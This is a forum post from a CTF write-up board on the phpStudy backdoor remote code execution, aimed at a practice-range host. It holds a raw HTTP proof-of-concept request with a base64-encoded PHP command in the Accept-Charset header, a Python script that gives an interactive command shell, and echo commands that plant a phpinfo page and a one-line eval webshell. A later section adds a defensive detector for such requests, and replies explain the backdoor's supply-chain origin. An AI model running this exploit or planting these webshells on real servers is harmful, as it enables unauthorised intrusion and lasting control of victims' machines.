Cat House (猫舍) phpstudy getshell

jussi   ·   Posted 2021-09-25 10:56:11   ·   CTF&WP board

phpstudy backdoor RCE

poc:

GET /?id=1 HTTP/1.1
Host: rhiq8003.ia.aqlab.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://rhiq8003.ia.aqlab.cn/
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

exp:

# jussi
import base64
import requests
import re

print("\n========== Phpstudy Backdoor Exploit ============\n")

def os_shell(url,headers,payload):
    try:
        r = requests.get(url = url, headers = headers, verify = False, timeout = 20)
        res = re.findall("flag(.*?)flag", r.text, re.S)
        res = "".join(res)
        print(res)
    except:
        print("[ - ]=========== Failed! Timeout... ==========[ - ]\n")

def main():
    url = "http://rhiq8003.ia.aqlab.cn/"
    while True:
        cmd = input("> ")
        payload = "echo \"flag\";system(\"" + cmd + "\");echo \"flag\";"
        payload = base64.b64encode(payload.encode('utf-8'))
        payload = str(payload, 'utf-8')
        headers = {
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'accept-charset': payload,
            'Accept-Encoding': 'gzip,deflate',
            'Connection': 'close',
        }
        os_shell(url=url, headers=headers, payload=payload)

if __name__ == '__main__':
    main()

Write phpinfo()

echo \"<?php phpinfo();?>\" > ..\WWW\qazwsx.php

Write a one-line webshell

echo \"<?php eval(@\$_POST['zkaqzkaq']);?>\" > ..\WWW\qazwsxedc.php

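A defensive check for the request shape shown in the PoC above, added here as an example and not part of the original post: it flags requests whose Accept-Charset header decodes from base64 to PHP-like code. The function names, the regex heuristic and the sample host lab.example are assumptions made for this example.

```python
import base64
import re

# Heuristic (an assumption of this example): decoded text containing a call ending in ';'.
PHP_LIKE = re.compile(r"[A-Za-z_]\w*\s*\(.*?\)\s*;", re.S)

def parse_headers(raw_request):
    """Return {lower-cased header name: value} from a raw HTTP/1.1 request."""
    headers = {}
    for line in raw_request.splitlines()[1:]:   # skip the request line
        if not line.strip():
            break                               # blank line ends the header block
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def inspect_request(raw_request):
    """Return a finding dict if Accept-Charset carries base64-encoded code, else None."""
    headers = parse_headers(raw_request)
    value = headers.get("accept-charset", "")
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-8")
    except ValueError:                          # charset lists like "utf-8, ..." fail here
        return None
    if not decoded.isprintable() or not PHP_LIKE.search(decoded):
        return None
    return {
        "decoded": decoded,
        # The PoC and exp on this page send "gzip,deflate" with no space after the comma.
        "encoding_matches_poc": headers.get("accept-encoding") == "gzip,deflate",
    }

# Constructed samples: the first mirrors the PoC request on this page, the second is benign.
SUSPICIOUS = "\r\n".join([
    "GET /?id=1 HTTP/1.1",
    "Host: lab.example",
    "accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7",
    "Accept-Encoding: gzip,deflate",
    "Connection: close", "", ""])
BENIGN = "\r\n".join([
    "GET / HTTP/1.1",
    "Host: lab.example",
    "Accept-Charset: utf-8, iso-8859-1;q=0.5",
    "Accept-Encoding: gzip, deflate",
    "Connection: close", "", ""])

if __name__ == "__main__":
    for name, req in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, inspect_request(req))
```

The same check can be run over headers captured by a reverse proxy or WAF log, since the decoded value shows exactly what code a request tried to run.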

2 replies   |  as of 2021-10-24 | 1169 views

Track-聂风
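Posted 2021-10-9

The reason is that the official PHPstudy website was once hacked; the attackers then swapped out the contents of the official download file and quietly planted a backdoor, and this went on for several years without being discovered.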

dienamer
Posted 2021-10-24

I didn't really understand this vulnerability. Is this a packet captured from the practice range?